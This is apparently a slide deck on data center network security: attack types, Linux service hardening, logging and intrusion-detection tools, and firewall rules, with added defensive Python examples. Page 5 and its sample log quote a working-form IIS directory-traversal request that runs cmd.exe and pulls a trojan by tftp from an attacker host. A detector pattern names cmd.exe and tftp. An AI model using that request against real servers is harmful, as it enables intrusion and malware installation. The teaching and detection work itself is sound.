Data Center Network Security. History Old days – security = planting two firewalls Today –...


Page 1: Data Center Network Security. History Old days – security = planting two firewalls Today – security = very complex problem.

Data Center Network Security

Page 2:

History

• Old days – security = planting two firewalls

• Today – security = very complex problem

Page 3:

Type of attacks

• Attacks on networks have become more sophisticated and are carried out through, but not limited to, one of the following techniques:

– Packet sniffing— an application that puts the network adapter into promiscuous mode to capture every packet on the segment, including cleartext logins.

– IP spoofing— an attack in which the attacker assumes another host's IP address, either to conceal its true identity or to pass address-based access checks.

– Denial-of-service (DoS) attack— aims to overwhelm a service so that legitimate requests cannot be serviced. The exhausted resource may be bandwidth, memory, CPU or connection-table state. It is the most well-known of all Internet attacks, and effort should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:

• Code Red and Blaster (worms whose payloads launched floods against fixed targets)
• Ping of Death (an oversized, fragmented ICMP echo that crashed the receiving IP stack)
• Trinity (a distributed DoS agent controlled over IRC)

Page 4:

Type of attacks

• Password attack— as its name implies, this attack aims to acquire passwords to important assets so as to cause further damage. Passwords can be harvested with the techniques already mentioned (sniffing a cleartext login, a man-in-the-middle position) or guessed by brute force.

• Man-in-the-middle attack— this type of attack happens when an attacker manages to position themselves between the source and the destination of a network transaction and can read or alter it. ARP cache poisoning is one common method on a shared LAN segment.

• Application attack— this type of attack happens when flaws in application software are exploited to gain access to a computer system. The flaws may be implementation bugs (buffer overflows, unchecked input) or simply unnecessary services left reachable on open TCP ports.

• Port redirection attack— this type of attack uses a compromised host as a relay to reach a network that is otherwise protected: the firewall permits the compromised host, so traffic tunnelled through it passes the ruleset.

Page 5:

Typical Intrusion Sequence: Hacking the Web/Application Server

• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server.

• The hacker exploits the vulnerability to get a shell. For example, copying the Trojan onto the web/application server with a single request:

https://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

• This is the IIS Unicode directory traversal: %c0%af is an overlong UTF-8 encoding of "/" that the server decoded only after it had checked the path, so the request escapes the /scripts directory and executes cmd.exe, which uses the host's own tftp client to fetch trojan.exe from the attacker's machine (10.20.15.15 in the slide) onto the server.
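How a SOC would spot that sequence in the web server's own logs, as an added Python example (not code from the original presentation): the URL is normalized the way the vulnerable server did it (repeated percent-decoding, overlong UTF-8 mapped to its plain character, backslashes folded to slashes) and only then matched for traversal and for command execution or tool download. The log lines are constructed samples embedded in the script, the first one reproducing the request from the slide; the function names are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed web-server log lines (Common Log Format) for this example. The first
# line is the request from the slide; the second is the same attack with double
# percent-encoding; the third is benign; the fourth is a plain traversal probe.
SAMPLE_LOG = """\
10.20.15.15 - - [12/Aug/2003:10:01:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe HTTP/1.0" 200 1523
10.20.15.15 - - [12/Aug/2003:10:01:09 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 812
192.0.2.44 - - [12/Aug/2003:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 4096
192.0.2.45 - - [12/Aug/2003:10:02:20 +0000] "GET /docs/..%2f..%2fetc%2fpasswd HTTP/1.1" 404 210
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) (?P<ver>\S+)" (?P<status>\d+)')

# Overlong UTF-8 encodings of '/' and '\' that a naive decoder accepts. A correct
# decoder rejects them, which is why a path check done before decoding misses them.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\",
            b"\xe0\x80\xaf": b"/", b"\xe0\x81\x9c": b"\\"}
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
TOOLING = re.compile(r"cmd\.exe|/bin/sh|tftp")


def normalize_url(url, max_rounds=3):
    """Undo percent-encoding (repeatedly, for double encoding), overlong UTF-8
    and backslashes so rules match what the server would actually execute."""
    raw = url.encode("ascii", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for seq, plain in OVERLONG.items():
        raw = raw.replace(seq, plain)
    return raw.decode("latin-1").replace("\\", "/").lower()


def inspect_line(line):
    """Parse one log line; return a record whose 'reasons' list is empty when benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = m["url"]
    normalized = normalize_url(url)
    reasons = []
    if any(seq in unquote_to_bytes(url) for seq in OVERLONG):
        reasons.append("overlong UTF-8 in URL")
    if TRAVERSAL.search(normalized.split("?")[0]):
        reasons.append("directory traversal")
    if TOOLING.search(normalized):
        reasons.append("command execution or tool download")
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "url": url, "normalized": normalized, "reasons": reasons}


def find_intrusions(log_text):
    """Return the records of every line with at least one reason, in log order."""
    return [rec for rec in map(inspect_line, log_text.splitlines())
            if rec and rec["reasons"]]


if __name__ == "__main__":
    for hit in find_intrusions(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["status"], hit["reasons"])
        print("   ", hit["normalized"])
```

The status code matters when triaging: a 200 on a request like the first line means the traversal worked and the download command ran, whereas the 404 on the last line is a probe that failed.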

Page 6:

Automated Intrusion Sequence—Blaster Ex.

Page 7:

Attack Patterns

Page 8:

Server Farm Security Strategies

Page 9:

Segmenting the Server Farm

Page 10:

Building the Firewall Ruleset

Page 11:

From Physical Separation to Logical Separation

Page 12:

Avoid Break-ins in Linux

• To save on system resources and keep administration simple, many services are handled through one configuration file, /etc/inetd.conf. This file tells the inetd super-server which services to listen for and how to run each of them. (Newer distributions do the same job with xinetd or systemd socket units, but the principle is identical: every entry is a listening port.)

• Many Linux vendors turn various services on in inetd.conf by default when, for maximum security, they should be off.

• In many corporate environments security as such is not an issue: if there is enough protection to prevent accidental damage in these 'soft' environments, providing access to these services matters more than turning them off.

Page 13:

Avoid Break-ins in Linux

• If your Linux host is exposed to the Internet you may hold a different point of view. To check what services are currently listening on your Linux system, type the command

netstat -vat

• (-a lists listening sockets as well as established ones, -t restricts the listing to TCP, -v is verbose; add -u to see UDP listeners too and, as root, -p to see which process owns each socket. On current systems the ss utility gives the same view.)

• This will print something like this:

tcp 0 0 *:6000   *:* LISTEN
tcp 0 0 *:www    *:* LISTEN
tcp 0 0 *:auth   *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:shell  *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN

• Each line that says LISTEN is a service waiting for connections, and "*:" means it is bound on every address, so it is reachable from the Internet as well as from the LAN. In this listing that is the X server (6000), a web server (www, port 80), identd (auth, 113), finger (79), rsh (shell, 514) and the RPC portmapper (sunrpc, 111).

Page 14:

Avoid Break-ins in Linux

• Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type

grep '^finger' /etc/inetd.conf

• you will get back a line from inetd.conf like this:

finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

• The fields are: the service name (looked up in /etc/services for the port number), the socket type, the protocol, wait/nowait, the user the server runs as, the program inetd executes (here the tcpd wrapper, which applies /etc/hosts.allow and /etc/hosts.deny before handing over) and the real server with its arguments.

Page 15:

Avoid Break-ins in Linux

• To see what the program does, look up in.fingerd in the man pages.

• If you think you can live without this service, it can be turned off in /etc/inetd.conf.

• Comment the line out (put a # at the start of the line) and then issue the command

killall -HUP inetd

• This turns the service off immediately and permanently: the edit survives a reboot, and the HUP signal makes inetd re-read its configuration, so there is no need to reboot. Check with netstat afterwards that the port is really gone.

Page 16:

Avoid Break-ins in Linux

• If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone daemon started from the boot scripts.

• You can remove a service provided by a stand-alone background program by uninstalling its package, or by disabling its startup script so it is not launched at boot. Only do this if you are sure what the program does and are certain that it is not necessary.
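The audit the last four slides walk through (list what is listening, look each name up in inetd.conf, comment the unwanted entries out, then HUP inetd) as an added Python example; this is not code from the original presentation. The netstat listing and the inetd.conf are constructed samples embedded in the script; on a real host you would feed it the output of netstat and the real /etc/inetd.conf. The helper names are this example's own, and `disable_services` only rewrites the text: writing the file back and running killall -HUP inetd are left to the operator.

```python
# Constructed sample data for this example: a `netstat -at` listing and an
# /etc/inetd.conf in the classic format shown on the slides.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address  State
tcp        0      0 *:6000          *:*              LISTEN
tcp        0      0 *:www           *:*              LISTEN
tcp        0      0 *:auth          *:*              LISTEN
tcp        0      0 *:finger        *:*              LISTEN
tcp        0      0 *:shell         *:*              LISTEN
tcp        0      0 *:sunrpc        *:*              LISTEN
tcp        0      0 10.1.1.5:ssh    10.1.1.9:40112   ESTABLISHED
"""

INETD_CONF = """\
# /etc/inetd.conf  -- constructed sample
#<service> <socket> <proto> <flags> <user> <server> <args>
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  /usr/sbin/in.ftpd
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  /usr/sbin/in.fingerd
shell   stream  tcp  nowait  root    /usr/sbin/tcpd  /usr/sbin/in.rshd
auth    stream  tcp  nowait  nobody  /usr/sbin/in.identd  in.identd -l -e -o
#telnet stream  tcp  nowait  root    /usr/sbin/tcpd  /usr/sbin/in.telnetd
"""


def listening_services(netstat_text):
    """Service names bound on all interfaces ('*:name') and in LISTEN state."""
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            local = fields[3]
            if local.startswith("*:"):
                found.append(local[2:])
    return found


def inetd_entries(conf_text):
    """Map each active (uncommented) inetd.conf service name to its line."""
    entries = {}
    for line in conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        entries[stripped.split()[0]] = stripped
    return entries


def classify(netstat_text, conf_text):
    """Split the listeners into inetd-managed (name -> config line) and stand-alone."""
    managed = inetd_entries(conf_text)
    inetd, standalone = {}, []
    for svc in listening_services(netstat_text):
        if svc in managed:
            inetd[svc] = managed[svc]
        else:
            standalone.append(svc)
    return inetd, standalone


def disable_services(conf_text, services):
    """Comment out the given services. Returns (new_text, names actually changed).
    After writing new_text back to /etc/inetd.conf, `killall -HUP inetd` applies it."""
    changed, out = [], []
    for line in conf_text.splitlines():
        name = line.split()[0] if line.strip() and not line.startswith("#") else None
        if name in services:
            out.append("#" + line)
            changed.append(name)
        else:
            out.append(line)
    return "\n".join(out) + "\n", changed


if __name__ == "__main__":
    managed, standalone = classify(NETSTAT_OUTPUT, INETD_CONF)
    print("inetd-managed listeners:", sorted(managed))
    print("stand-alone listeners:  ", standalone)   # 6000 (X), www, sunrpc have no inetd entry
    new_conf, changed = disable_services(INETD_CONF, {"finger", "shell"})
    print("disabled:", changed)
    print(new_conf)
```

The stand-alone list is the one that needs the package-level treatment from this slide; X on 6000 and the portmapper on sunrpc have no inetd entry to comment out.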

Page 17:

SSH

• To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts (TCP wrappers: tcpd, or servers linked against libwrap). For instance, you may wish to allow logins from machines at your own site but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list the services and the hosts they may be used from. hosts.allow is consulted first, then hosts.deny, and a connection that matches neither file is allowed, so a missing or empty hosts.deny protects nothing.
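How those two files are evaluated, as an added Python example (not from the original presentation and not tcpd's code) that reproduces the tcpd decision order on constructed hosts.allow and hosts.deny contents embedded in the script. It implements the address forms of the hosts_access(5) syntax (ALL, a trailing-dot prefix, net/mask, a single address, and EXCEPT) and deliberately no hostname patterns; the function names are this example's own.

```python
import ipaddress

# Constructed /etc/hosts.allow and /etc/hosts.deny for this example.
HOSTS_ALLOW = """\
# management LAN may reach every wrapped service; ssh also from the office range
ALL: 10.1.1.0/255.255.255.0
sshd: 192.0.2.
in.ftpd: ALL EXCEPT 198.51.100.0/255.255.255.0
"""
HOSTS_DENY = """\
# everything not explicitly allowed above is refused
ALL: ALL
"""


def _rules(text):
    """Yield (daemon_list, client_list) from a hosts.allow/hosts.deny file.
    A third ':' field (a shell command to spawn) is ignored here."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = [p.strip() for p in line.split(":")]
            yield parts[0], parts[1]


def _match_daemon(pattern, daemon):
    return pattern == "ALL" or pattern == daemon


def _match_client(pattern, ip):
    if pattern == "ALL":
        return True
    if pattern.endswith("."):                    # '192.0.2.' matches 192.0.2.x
        return str(ip).startswith(pattern)
    if "/" in pattern:                           # 'net/mask' or 'net/prefixlen'
        return ip in ipaddress.ip_network(pattern, strict=False)
    return str(ip) == pattern


def _match_list(lst, subject, match):
    """'a b EXCEPT c d' matches when (a or b) and not (c or d); EXCEPT nests to the right."""
    if " EXCEPT " in f" {lst} ":
        head, tail = lst.split("EXCEPT", 1)
        return _match_list(head, subject, match) and not _match_list(tail, subject, match)
    return any(match(tok, subject) for tok in lst.split())


def tcpd_decision(daemon, client, allow_text=HOSTS_ALLOW, deny_text=HOSTS_DENY):
    """Reproduce tcpd's order: the first match in hosts.allow grants, then the
    first match in hosts.deny refuses, and a client matching neither is granted."""
    ip = ipaddress.ip_address(client)
    for daemons, clients in _rules(allow_text):
        if _match_list(daemons, daemon, _match_daemon) and _match_list(clients, ip, _match_client):
            return "allow"
    for daemons, clients in _rules(deny_text):
        if _match_list(daemons, daemon, _match_daemon) and _match_list(clients, ip, _match_client):
            return "deny"
    return "allow"


if __name__ == "__main__":
    for daemon, client in [("sshd", "192.0.2.7"), ("sshd", "203.0.113.9"),
                           ("in.ftpd", "198.51.100.4"), ("in.telnetd", "10.1.1.20")]:
        print(f"{daemon:10} from {client:15} -> {tcpd_decision(daemon, client)}")
```

The last return statement is the pitfall: with the deny file empty, every daemon becomes world-reachable, which is why a catch-all "ALL: ALL" in hosts.deny is the first line most hardening guides ask for.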

Page 18:

SSH

• Denying connections by checking the client host is a good basic way to throw off attacks.

• It is not the end of the story.

• It is possible to fake host names on incoming connections (oh yes it is): a name-based rule trusts the reverse DNS lookup of the client address, and DNS answers can be forged, so prefer address patterns over host names.

• While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge and a vantage point on the path can read your data. Using a method known as 'spoofing' they can even inject fake packets into a legitimate stream (session hijacking).

• These problems come about because of the way the Internet protocols were designed: they carry no proof of who sent a packet or that it was not altered on the way. To overcome these difficulties ssh was devised.

Page 19:

SSH

• Ssh is a stable, well-developed system with open source implementations that provides encryption and authentication for connections.

• Encryption uses ciphers to protect the packets of data while in transit, so an eavesdropper on the path sees only ciphertext.

• Authentication is the process of verifying that a connection is with the host you intended (host keys) and the user who claims to be logging in (passwords or public keys), and that each packet has not been altered or injected in transit (a per-packet integrity check).

• There are ssh clients for most other operating systems too.

• By using Linux as a server you can provide ssh-level security for all your network use, including file transfer and tunnelled connections to other services.

Page 20:

Logging

• Linux has a comprehensive set of subsystems to let the system administrator know what is going on with his or her system.

• All manner of log files are generally kept in the /var/log directory.

• Most of the standard services log information about users connecting to them, or attempting to connect, to /var/log/syslog and /var/log/messages via syslog.

• There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and the firewall (/var/log/firewall). Exact names and locations vary by distribution and by the syslog configuration; packet-filter log messages in particular come from the kernel, so they land wherever kernel messages are routed.

Page 21:

Logging

• The main problem with logging events is that one tends to end up with too much data.

• Careful filtering and logging only the important information is essential, with the caveat that what looks unimportant today (a single failed login, one dropped packet) is often exactly the record you need after a break-in.

Page 22:

Logging

• There are some good tools out there that will make this work easier.

• Ethereal (since renamed Wireshark) is a packet sniffer
– With it you can capture various types of packets over a given period of time.
– It also shows all manner of information about the packets, decoding each protocol layer.
– It is useful for watching packets coming into and going out of your machine.
– Generally it will capture traffic on your network segment; on a switched network that means only traffic to or from the capture host plus broadcasts, unless the switch mirrors a port to it.

Page 23:

Logging

• Another logging/intrusion-detection type tool is called Tripwire.
– It takes a snapshot of your important system files and records their signatures (hashes and metadata) in a database.
– Various signature levels are available, from mild to wild.
– You can also set the rules in a policy file to tell Tripwire what to check and how serious a change to each file is.
– After the database is initialized and signed, Tripwire can be executed whenever you need to check the integrity of your system.
– The report will point out which files changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file-tracking needs.
– The baseline is only as good as the system it was taken from, so build it on a freshly installed host before it goes on the network, and keep the database and its signing key somewhere an intruder with root cannot rewrite them (read-only media, or off the host).
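What such a file-integrity check does under the hood, as an added Python example (not from the original presentation and not Tripwire's own code): a signed baseline of hashes and metadata, a policy mapping directories to severities, and a check that reports added, removed and changed files. The `demo` function builds a small tree in a temporary directory, baselines it, simulates an intrusion (a trojaned binary of the same size, a dropped file, an appended log) and runs the check; every path, content and key in it is constructed.

```python
import hashlib
import hmac
import json
import os
import stat
import tempfile


def fingerprint(path):
    """Content hash plus the metadata a rootkit install typically alters."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
    return {"sha256": digest.hexdigest(), "mode": stat.S_IMODE(st.st_mode),
            "uid": st.st_uid, "gid": st.st_gid, "size": st.st_size}


def build_database(root):
    """Snapshot every file below root, keyed by path relative to root."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            db[os.path.relpath(full, root).replace(os.sep, "/")] = fingerprint(full)
    return db


def sign_database(db, key):
    """HMAC over the canonical JSON form; the key is kept off the host."""
    canon = json.dumps(db, sort_keys=True).encode()
    return hmac.new(key, canon, hashlib.sha256).hexdigest()


def verify_database(db, signature, key):
    """False means the baseline itself was tampered with (or the key is wrong)."""
    return hmac.compare_digest(sign_database(db, key), signature)


def severity_for(rel, policy):
    """Highest severity of any policy prefix covering this path (0 if none)."""
    return max((sev for prefix, sev in policy.items()
                if rel == prefix or rel.startswith(prefix + "/")), default=0)


def check(root, db, policy):
    """Compare the live tree with the baseline; returns (path, change, severity) rows."""
    current = build_database(root)
    report = []
    for rel in sorted(set(db) | set(current)):
        if rel not in current:
            change = "removed"
        elif rel not in db:
            change = "added"
        elif db[rel] != current[rel]:
            change = "changed:" + ",".join(k for k in db[rel] if db[rel][k] != current[rel][k])
        else:
            continue
        report.append((rel, change, severity_for(rel, policy)))
    return report


def demo():
    """Build a tiny system tree, baseline it, 'break in', then run the check."""
    root = tempfile.mkdtemp()
    policy = {"bin": 100, "etc": 66, "var/log": 10}   # severity per tree, like a policy file

    def put(rel, data):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

    put("bin/ls", b"ELF-original")
    put("etc/passwd", b"root:x:0:0:root:/root:/bin/sh\n")
    put("var/log/messages", b"boot ok\n")
    baseline = build_database(root)
    signature = sign_database(baseline, b"offline-signing-key")
    # Simulated intrusion: trojaned ls (same size), dropped rootkit file, appended log.
    put("bin/ls", b"ELF-trojaned")
    put("bin/.rootkit", b"installer")
    put("var/log/messages", b"boot ok\nlogin from 10.20.15.15\n")
    return check(root, baseline, policy), verify_database(baseline, signature, b"offline-signing-key")


if __name__ == "__main__":
    report, intact = demo()
    print("baseline signature intact:", intact)
    for rel, change, sev in report:
        print(f"[{sev:3}] {change:22} {rel}")
```

The same-size trojaned binary is why the content hash, not the size or timestamp, is the field that matters; the severity column is what lets a busy administrator read the bin/ lines first and ignore the log file growing.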

Page 24:

Logging

• A popular program for detecting access attempts (via the network) and port scans is Snort.

• The program produces files that log these types of activities and, because each rule can carry references, even gives some idea of where to find more information about the attack it matched.

• The same problem as with other log files: it gets tough for a busy system administrator to review all the log files on a regular basis.

Page 25:

Firewalls

• A firewall is a device that protects a private network from the wider Internet.
– The simplest form of firewall is a Linux machine with one network connection (an Ethernet card or modem) connected to the Internet and another connected to the private network.
– The firewall computer can reach both the protected network and the Internet.
– Traffic between the protected network and the Internet is controlled, in both directions, by a list of rules.
– These rules can be customized for your needs.

• CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It is designed specifically to address the need for an easy-to-install, no-nonsense Linux firewall.

Page 26:

Firewalls

• All data flowing between the Internet and the private network is filtered by the firewall.

• Inside the private network less care needs to be taken with turning off services and the like, although the hosts should still be hardened: the firewall does nothing against an attacker who is already inside, or against traffic it has been told to permit.

• It is a way of concentrating effort on making one machine secure and protecting many others in the process.

• The methods for correctly setting up firewalls are quite complex.
– First you have to configure your machine with two Ethernet cards (or an Ethernet card and a modem).
– Then you have to use the ipchains (2.2 kernels) or iptables (2.4 and later) software to set up the filters that govern what is forwarded between the two interfaces.

Page 27:

Firewalls

• The main drawback of making your systems more secure is that they become less accessible.

• The idea behind ramping up your system's security is to stop use of your computers by crooks, thieves and malcontents but let the legitimate users use the system.

Page 28:

Tools

• Tools for defense can be grouped into four categories:
– log monitoring
– connection monitoring
– host-based intrusion detection
– network-based intrusion detection

Page 29:

Log Monitoring

• These tools will watch over your log files and help you detect security-related events (actually, based on the rules, you can have them detect any type of event). Either by default or through configuration, they can e-mail you the alerts.
– autobuse
– logcheck
– Logwatch
– swatch

Page 30:

Connection Monitoring

• When connected to the Internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch.
– ippl
– jail
– klaxon
– portsentry
– tcplogd

Page 31:

Host based intrusion detection

• These days it is often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often they will take the additional step of installing a set of trojaned binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access.
– hostsentry
– Tripwire
– ViperDB

Page 32:

Network based intrusion detection

• These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They look at the traffic, attempt to match known attack patterns and notify you if an attack is seen.
– Network Flight Recorder
– SHADOW
– snort

Page 33:

Linux Firewalls

• Define a network security policy
• Use a secure Linux distro for your firewall
• Harden your firewall
– Install the minimum number of packages
– Turn all unused services off
– Disallow user logins
• Define a set of firewall rules
• Define egress and ingress filters
• You will probably need IP masquerade or NAT
– Allows internal machines to get out on the net
– The outside world sees all the internal machines as the gateway's single address (e.g. www.foo.com)
• Start with existing, proven, simple example firewall configurations
• Test your firewall from the inside and the outside
– Run the known exploits and vulnerability checks against it
– Run the known hacking tools and attacks against it
– Try the known rootkits against it and confirm they are detected
• Installing a firewall does NOT solve the "security" problem

Page 34:

Linux Firewall Rules

• Example firewall scripts
– SecurityFocus.net
– Linux-Sec.net/FW/Scripts

• General firewall rules
– Turn on ingress and egress rules
– Turn on/off the relevant /proc options (IP forwarding among them)

• Outgoing rules
– Allow all internal PCs to freely access the Internet

• Incoming rules (each one restricted to the single server that provides the service, not the whole LAN)
– Allow incoming DNS requests to the DNS server
– Allow incoming SMTP requests to the mail server
– Allow incoming HTTP requests to the web server
– Allow incoming FTP requests to the ftp server
– Allow incoming ssh requests to the ssh server
– Allow incoming wireless requests to the wireless gateway server
– Allow incoming ppp requests to the ppp gateway server
– Allow incoming secure POP3/IMAP requests to the secure pop server
– Allow incoming authenticated VPN requests to the VPN server

• Disallow messenger.msn.com
• Disallow oscar.aol.com
• Disallow messenger.yahoo.com (IIRC)

Page 35:

Linux Firewall Rules

• NAT rules / IP masquerade
– E-InfoMax.com IPMasquerade
– IPMasq.cjb.net IP_Masquerade-HOWTO
– LinuxDoc.org IP_Masquerade-HOWTO
– CSUChico.edu

• 3-line IP masquerade (LinuxDoc.org):

ipchains -P forward DENY
ipchains -A forward -i ppp0 -j MASQ
echo 1 > /proc/sys/net/ipv4/ip_forward

– Default-deny the forward chain, masquerade everything that leaves through the ppp0 link, then enable forwarding in the kernel. The order matters: enabling forwarding before the policy is in place briefly routes everything unfiltered. ipchains is the 2.2-kernel tool; iptables and nftables replaced it, but the three steps are the same.

• Egress and ingress filtering
– Ingress filtering: incoming network traffic entering your LAN
  IETF.org RFC2827.txt; Sans.org Packet_filter - ingress/egress; Sans.org Firewall Issues
– Egress filtering: outgoing network traffic leaving your LAN
  Sans.org Top Ten Blocking Recommendations Using IPChains; Sans.org ipchains Egress Rules; Sans.org Egress Filtering - cisco; Sans.org Egress Filtering (same as above); Incidents.org Egress - cisco

Linux Firewall Rules
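The ingress, egress and incoming-service rules from the last two slides, as an added Python example (not from the original presentation and not ipchains syntax): a small stateful packet filter that drops spoofed sources on the outside interface (RFC 2827), drops packets leaving the LAN with a source address that is not ours, admits each published service only to its own server, and otherwise accepts inbound packets only as replies to flows the LAN opened. The addresses, the `Packet` record and the `decide` function are this example's own assumptions; NAT is left out.

```python
import ipaddress
from dataclasses import dataclass

# Constructed addressing for this example (an assumption, not from the slides).
INTERNAL = ipaddress.ip_network("192.168.1.0/24")       # the LAN behind the firewall
PUBLIC_SERVICES = {                                     # (proto, port) -> the one server that may receive it
    ("udp", 53): ipaddress.ip_address("192.168.1.53"),  # DNS server
    ("tcp", 25): ipaddress.ip_address("192.168.1.25"),  # mail server
    ("tcp", 80): ipaddress.ip_address("192.168.1.80"),  # web server
    ("tcp", 22): ipaddress.ip_address("192.168.1.22"),  # ssh server
}
# Stand-in for the resolved addresses of the IM servers the slide disallows.
BLOCKED_DESTINATIONS = {ipaddress.ip_address("198.51.100.10")}
# Source ranges that can never legitimately arrive from the Internet (RFC 1918,
# loopback, link-local, "this network"); RFC 2827 says drop them at the edge.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Packet:
    iface: str    # interface the packet arrived on: "wan" (Internet side) or "lan"
    proto: str    # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int


def decide(pkt, flows):
    """Return (verdict, reason). `flows` is the connection table: every accepted
    outbound packet records its 5-tuple, and an inbound packet is accepted as a
    reply only when the mirrored 5-tuple is present."""
    src, dst = ipaddress.ip_address(pkt.src), ipaddress.ip_address(pkt.dst)

    if pkt.iface == "wan":
        # Ingress filtering: reject spoofed sources before any other rule.
        if src in INTERNAL or any(src in net for net in BOGONS):
            return "DROP", "spoofed source address on external interface"
        if dst not in INTERNAL:
            return "DROP", "destination is not on our network"
        if (pkt.proto, dst, pkt.dport, src, pkt.sport) in flows:
            return "ACCEPT", "reply to a flow the LAN opened"
        # Incoming rules: each published service only to its own server.
        if PUBLIC_SERVICES.get((pkt.proto, pkt.dport)) == dst:
            return "ACCEPT", f"published service {pkt.proto}/{pkt.dport}"
        return "DROP", "unsolicited inbound connection"

    # Egress filtering: a host on our LAN may only speak with our addresses, so a
    # compromised box cannot source spoofed flood traffic through this firewall.
    if src not in INTERNAL:
        return "DROP", "egress: source address is not ours"
    if dst in BLOCKED_DESTINATIONS:
        return "REJECT", "destination is on the deny list"
    # Outgoing rule: internal PCs reach the Internet freely; remember the flow.
    flows.add((pkt.proto, src, pkt.sport, dst, pkt.dport))
    return "ACCEPT", "outbound from an internal host"


if __name__ == "__main__":
    table = set()
    for p in [Packet("lan", "tcp", "192.168.1.10", 40000, "203.0.113.5", 80),
              Packet("wan", "tcp", "203.0.113.5", 80, "192.168.1.10", 40000),
              Packet("wan", "tcp", "198.51.100.7", 51000, "192.168.1.10", 80),
              Packet("wan", "tcp", "192.168.1.5", 51000, "192.168.1.80", 80),
              Packet("lan", "tcp", "10.9.9.9", 40000, "203.0.113.5", 80)]:
        print(p.iface, p.proto, f"{p.src}:{p.sport} -> {p.dst}:{p.dport}", decide(p, table))
```

Stateless ipchains approximated the reply check by accepting inbound TCP segments without the SYN flag ("! -y"), which lets through anything an attacker sends with ACK set; the connection table above is what iptables' state matching later made available.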

Page 36:

Linux Firewall Rules

• Cisco ACLs
– Firewalls/HowTo/#Cisco Cisco ACLs

• Proxy server rules
– HiSecure Proxy (?)
– tcpr: ftp and telnet forwarder
– COAST udprelay
– Dec.com XForward
– ReDir: port redirector
– Reverse Pimpage Revision: remotely access machines behind a firewall
– Reverse Utilities: telnet/http/ssh access to machines behind a firewall
– SOCKS5: SourceForge.net tsocks; SourceForge.net socksd; inet.no dante; Umich.edu nylon
– SolSoft NSM: proxy-based firewall
– httpf: filters out Java, JavaScript, etc.
– tproxy
– Squid-Cache.org
– TIS Proxy Server

Page 37:

Data Center Firewalls

• FWSM
– Protocol support
– Syslog
– Management tools
– DoS protection

Page 38:

ACE

• ACE = Application Control Engine. In the vendor's words, it provides application and network operations management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise; it helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of service to the end user while simplifying the overall management and operation of a data center.

Page 39:

FWSM

• FWSM = Firewall Services Module

Page 40:

MARS

• MARS = Monitoring, Analysis and Response System

Page 41:

Data Center Firewalls

• ACE
– Integrated SLB and SSL
– High capacity
– Failover group per context
– Failover tracking by HSRP, interface, IP address
– Autostate aware
– Role-based access control
– Configuration rollback marking
– Bridge mode: interface pairs per context
– Advanced HTTP inspection: MIME/regex

Page 42:

ACE—FWSM Security Comparison

• Access lists
• Inspection engines
• Timeouts
• Private VLANs
• Role-based access control
• Failover
• Resource allocation
• Configuration rollback
• VLAN assignments

Page 43:

Stateful ACLs—Bridge Mode Context

ACE (note: ACE logging arrives in phase 2)

access-list BPDU ethertype permit bpdu
access-list blue extended permit ip any any
interface vlan 104
  bridge-group 1
  access-group input BPDU
  access-group input blue
  no shutdown
interface vlan 204
  bridge-group 1
  access-group input BPDU
